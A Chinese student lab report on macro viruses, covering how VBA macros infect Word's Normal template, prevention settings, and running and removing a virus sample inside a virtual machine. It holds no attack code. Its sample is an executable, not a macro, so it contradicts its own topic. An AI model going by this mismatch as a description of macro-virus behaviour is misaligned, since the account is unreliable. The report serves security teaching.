- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
宏病毒实验
1. 实验目的
(1)理解宏病毒的概念、病毒机制、传播手段以及预防措施。
(2)观察一个简单宏病毒感染计算机后的现象,并寻找清除病毒的方法。
2. 实验原理
宏(Macro)是微软公司出品的Office软件包中所包含的一项特殊功能。
微软公司设计此项功能的主要目的是给用户自动执行一些重复性的工作提供方便。
它利用简单的语法,把常用的动作写成宏,用户工作时就可以直接利用事先编写好的宏自动运行,以完成某项特定的任务,而不必反复重复相同的工作。
微软的Word Visual Basic for Application(VBA)是宏语言的标准。
宏病毒正是利用Word VBA 编写的一些宏,是一种寄存在文档或模板中的计算机病毒。
一旦打开含有宏病毒的文档,其中的宏就会执行,宏病毒被激活,转移到计算机中并驻留在Normal 模板上。
以后所有自动保存的文档都会感染上这种宏病毒。
预防宏病毒有以下几种基本的方法:
(1)防止执行自动宏:可以通过在DOS提示符下输入指令”WinWord.exe /m DisableAutoMacro”来防止打开Word文档时执行自动宏。
另外,在打开或关闭文档时按下Shift键可以使文档不执行任何自动宏。
(2)保护Normal模板:可以采取以下几种方法对Normal模板进行保护。
提示保存Normal模板;设置Normal模板的只读属性;设置密码保护;设置安全级别;按照自己的习惯设置Normal模板并进行备份,当被病毒感染时,使用备份模板覆盖当前模板。
(3)使用DisableAutoMacro功能。
3. 实验环境
虚拟机下Windows server 2003
4. 实验内容
本实验拟在虚拟机下感染一个简单的宏病毒,然后观察病毒对计算机有什么影响,最后寻求清除方法。
5. 实验步骤
1、打开一台虚拟机,并运行病毒文件。
2、病毒运行后,每个几秒钟就会弹出一个对话框,无法关闭,重启后依旧运行,也就是电脑感染了病毒。
同时,打开任务管理器,会发现多了几个不明进程,结束后会自动恢复。
3、观察病毒对计算机造成的影响:
(1)频繁弹出对话框,影响正常操作;
(2)内存占用逐渐增大,最终导致计算机崩溃。
4、清除病毒。
首先结束VirtualVirus.exe进程。
5、结束进程taskmgr.exe和explorer.exe。
这两个进程互相保护,所以要结束这两个进程有两种方法:
方法1:用Windows的任务管理器中的结束进程树的方法。
该方法的缺点是不知道进程的路径,可能误结束系统进程。
方法2:使用可以同时结束两个进程的进程管理器,如IceSword,通过该进程管理器不仅可以看到进程名,还可以看到进程路径,这样就不会误删系统进程。
由于虚拟机上没有相应的进程管理器软件,本实验采用第一种方法(为避免
误结束系统进程,我在感染病毒之前已经通过进程大小辨认好了系统进程)。
6、修改注册表。
删除
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runexplor er和taskmgr两个键
7、删除病毒副本。
删除C:\WINDOWS\system32\explorer.exe和C:\WINDOWS\taskmgr.exe。
(如果无法删除请用360等杀毒软件粉碎即可)
7、至此,病毒就从计算机中清除了。
6、实验总结
本次实验让我对宏病毒有了一个初步的认识理解,并且通过一个简单的感染以及清除实例,更加直观鲜明地便显出了宏病毒的特征、危害性等,使我们对宏病毒具备了一定的防范意识和感染后的处理措施,总的来说,本次实验还是非常有实践意义的,不仅增强了理论知识,也丰富了我们的动手操作的实践经验,获益匪浅。